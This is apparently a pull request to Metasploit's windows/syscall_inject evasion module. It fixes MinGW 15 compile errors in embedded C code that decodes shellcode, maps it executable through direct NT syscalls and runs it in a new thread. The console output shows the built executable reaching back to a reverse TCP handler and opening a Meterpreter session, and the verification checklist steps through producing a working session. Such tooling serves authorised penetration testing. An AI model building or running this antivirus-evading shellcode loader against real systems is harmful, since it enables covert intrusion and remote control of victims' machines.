### PR TITLE
Fix syscall_inject compilation errors on MacOS with MinGW 15

### DIFF
--- a/modules/evasion/windows/syscall_inject.rb
+++ b/modules/evasion/windows/syscall_inject.rb
@@ -462,8 +462,7 @@ class MetasploitModule < Msf::Evasion
             PBYTE shellcode = (PBYTE)malloc(b64len);
             SIZE_T size = base64decode(shellcode, enc_shellcode, b64len);
             PVOID bAddress = NULL;
-            int process_id = GetCurrentProcessId();
-            cID.UniqueProcess = process_id;
+            cID.UniqueProcess = ULongToHandle(GetCurrentProcessId());
             NtOpenProcess(&pHandle, PROCESS_ALL_ACCESS, &OA, &cID);
             NtAllocateVirtualMemory(pHandle, &bAddress, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
             int n = 0;
@@ -490,7 +489,7 @@ class MetasploitModule < Msf::Evasion
             NtProtectVirtualMemory(pHandle, &bAddress, &size, PAGE_EXECUTE, &old);
             #{s if datastore['SLEEP'] > 0};
             HANDLE thread = NULL;
-            NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, NULL, NULL, NULL, NULL, NULL);
+            NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, 0, 0, 0, 0, NULL);
             WaitForSingleObject(thread, INFINITE);
             NtClose(thread);
             NtClose(pHandle);


### PR DESCRIPTION
This PR fixes compiler issues on MacOS when running the syscall_inject module with MinGW 15.

## MinGW
`brew install mingw-w64`
```
=> which x86_64-w64-mingw32-gcc    
/usr/local/bin/x86_64-w64-mingw32-gcc
...
=> /usr/local/bin/x86_64-w64-mingw32-gcc --version
x86_64-w64-mingw32-gcc (GCC) 15.2.0
Copyright (C) 2025 Free Software Foundation, Inc.
```

## Before
```
msf evasion(windows/syscall_inject) > run
[-] evasion failed: Compilation error. Check the logs for further information.
msf evasion(windows/syscall_inject) > log
...
[03/10/2026 17:09:47] [e(0)] core: /var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c: In function 'inject':
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:368:31: error: assignment to 'HANDLE' {aka 'void *'} from 'int' makes pointer from
 integer without a cast [-Wint-conversion]
  368 |             cID.UniqueProcess = process_id;
      |                               ^
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:391:89: error: passing argument 7 of 'NtCreateThreadEx' makes integer from pointer
 without a cast [-Wint-conversion]
  391 |             NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, NULL, NULL, NULL, NULL, NULL);
      |                                                                                         ^~~~
      |                                                                                         |
      |                                                                                         void *
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:107:22: note: expected 'ULONG' {aka 'long unsigned int'} but argument is of type 'void *'
  107 |             IN ULONG CreateFlags,
      |                ~~~~~~^~~~~~~~~~~
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:391:95: error: passing argument 8 of 'NtCreateThreadEx' makes integer from pointer without a cast [-Wint-conversion]
  391 |             NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, NULL, NULL, NULL, NULL, NULL);
      |                                                                                               ^~~~
      |                                                                                               |
      |                                                                                               void *
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:108:23: note: expected 'SIZE_T' {aka 'long long unsigned int'} but argument is of type 'void *'
  108 |             IN SIZE_T ZeroBits,
      |                ~~~~~~~^~~~~~~~
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:391:101: error: passing argument 9 of 'NtCreateThreadEx' makes integer from pointer without a cast [-Wint-conversion]
  391 |             NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, NULL, NULL, NULL, NULL, NULL);
      |                                                                                                     ^~~~
      |                                                                                                     |
      |                                                                                                     void *
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:109:23: note: expected 'SIZE_T' {aka 'long long unsigned int'} but argument is of type 'void *'
  109 |             IN SIZE_T StackSize,
      |                ~~~~~~~^~~~~~~~~
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:391:107: error: passing argument 10 of 'NtCreateThreadEx' makes integer from pointer without a cast [-Wint-conversion]
  391 |             NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, NULL, NULL, NULL, NULL, NULL);
      |                                                                                                           ^~~~
      |                                                                                                           |
      |                                                                                                           void *
/var/folders/hd/2w_y68hs5kv_4gq3kbthgphr0000gq/T/main20260310-63664-oh0eu1.c:110:23: note: expected 'SIZE_T' {aka 'long long unsigned int'} but argument is of type 'void *'
  110 |             IN SIZE_T MaximumStackSize,
      |                ~~~~~~~^~~~~~~~~~~~~~~~
[03/10/2026 17:09:47] [e(0)] core: Evasion failed (windows/syscall_inject) - Metasploit::Framework::Compiler::Mingw::UncompilablePayloadError Compilation error. Check the logs for further information.
```

## After
```
msf evasion(windows/syscall_inject) > run
[+] Tmsa.exe stored at /myuser/.msf4/local/Tmsa.exe
msf evasion(windows/syscall_inject) > ls ~/.msf4/local
[*] exec: ls ~/.msf4/local
Tmsa.exe
msf evasion(windows/syscall_inject)> to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.207.1:4444
...
*Run executable on target here, and wait 20 seconds*
[*] Sending stage (232006 bytes) to 192.168.207.169
[*] Meterpreter session 1 opened (192.168.207.1:4444 -> 192.168.207.169:49870) at 2026-03-10 17:14:28 +0000
```

## Note
An alternative fix would be casting the values where necessary:
```c
=> (SIZE_T)NULL
...
NtCreateThreadEx(&thread, THREAD_ALL_ACCESS, NULL, pHandle, exec, bAddress, (ULONG)NULL, (SIZE_T)NULL, (SIZE_T)NULL, (SIZE_T)NULL, (SIZE_T)NULL);
```
However setting these to the integer 0 allows them to be implicitly cast without issue or unexpected behaviour.

## Verification

- [ ] Start `msfconsole`
- [ ] `use evasion/windows/syscall_inject`
- [ ] `set` options such as lhost
- [ ] `to_handler`
- [ ] `run`
- [ ] Confirm no compilation errors
- [ ] Run the executable on the target
- [ ] confirm you have a working meterpreter session